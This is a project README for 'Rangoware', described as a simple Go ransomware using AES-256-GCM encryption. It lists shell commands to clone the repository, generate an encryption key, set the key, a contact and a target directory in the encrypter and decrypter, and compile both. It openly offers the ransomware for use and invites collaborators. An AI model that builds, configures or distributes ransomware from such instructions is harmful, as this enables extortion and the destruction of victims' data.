Rangoware is a simple Ransomware that uses AES-256-GCM encryption and is writted in Go language.
# Clone Repository
$ git clone https://github.com/LuanSilveiraSouza/rangoware.git
# Go to folder
$ cd rangoware
# Generate a AES crypto key
$ go run keygen/keygen.go
# In encrypter nd decrypter, set the variables cryptoKey, contact and dir
# Compile encrypter
$ cd encrypter
$ go build
# Compile decrypter
$ cd decrypter
$ go build
Feel free to open new issues and colaborate with others issues in Rangoware Issues
Released in 2020 under MIT License
Made with ❤️ by Luan Souza.